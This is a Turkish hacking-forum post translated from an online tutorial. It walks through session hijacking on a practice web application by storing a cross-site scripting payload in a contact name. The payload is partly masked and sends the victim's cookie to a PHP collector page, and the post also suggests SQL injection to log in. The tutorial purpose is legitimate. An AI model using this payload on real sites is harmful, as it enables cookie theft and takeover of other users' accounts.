Web sitesi hackleme hileleri: Çevrimiçi bir Web Sitesini Hackleyin

Legt

Üye
16 Eki 2020
211
14
J A V A
DİKKAT BU KONU YABANCI KAYNAKLARDAN ALINTIDIR!

Bu web sitesi hackleme pratik senaryosunda, Login | Personal Contacts Manager adresinde bulunan web uygulamasının kullanıcı oturumunu ele geçireceğiz . Çerez oturum kimliğini okumak için siteler arası komut dosyası kullanacağız ve daha sonra meşru bir kullanıcı oturumunu taklit etmek için kullanacağız.

Yapılan varsayım, saldırganın web uygulamasına erişimi olduğu ve aynı uygulamayı kullanan diğer kullanıcıların oturumlarını ele geçirmek istemesidir. Bu saldırının amacı, saldırganın erişim hesabının sınırlı olduğunu varsayarak web uygulamasına yönetici erişimi sağlamak olabilir.

Başlarken

Http://www.techpanda.org/ adresini açın.
Uygulama amacıyla, SQL Enjeksiyonu kullanılarak erişim sağlanması şiddetle tavsiye edilir. Bunun nasıl yapılacağı hakkında daha fazla bilgi için bu makaleye bakın .
Giriş e-postası [email protected] , şifre Password2010'dur
Başarıyla giriş yaptıysanız, aşağıdaki kontrol panelini alacaksınız


Article_12_1.png


Yeni Kişi Ekle'ye tıklayın
Aşağıdakileri ilk isim olarak girin
<a href=# onclick="********.********=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(********.cookie\)\;"> Koyu </a>

İŞTE,

Yukarıdaki kod JavaScript kullanır . Bir onclick olayı ile bir köprü ekler . Şüphelenmeyen kullanıcı bağlantıyı tıkladığında, olay PHP tanımlama bilgisi oturum kimliğini alır ve URL'deki oturum kimliği ile birlikte snatch_sess_id.php sayfasına gönderir.


Article_12_2.png


Kalan ayrıntıları aşağıda gösterildiği gibi girin
Değişiklikleri Kaydet'e tıklayın


Article_12_3.png


Kontrol paneliniz şimdi aşağıdaki ekran gibi görünecek
Article_12_4.png


Siteler arası betik kodu veritabanında depolandığından, erişim hakları olan kullanıcılar her oturum açtığında yüklenecektir.
Yöneticinin Dark yazan köprüye giriş yaptığını ve tıkladığını varsayalım.
URL'de oturum kimliğinin gösterildiği pencereyi alacak

Article_12_5.png


Not : komut dosyası, değeri PHPSESSID'nin depolandığı uzak bir sunucuya gönderiyor olabilir ve ardından kullanıcı hiçbir şey olmamış gibi web sitesine yeniden yönlendirebilir.

Not : Aldığınız değer bu web sayfası korsanlığı eğitimindekinden farklı olabilir, ancak konsept aynıdır


KAYNAK: https://www.guru99.com/how-to-hack-website.html

Kod gözükmemiş kaynaktan koda bakabilirsiniz
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.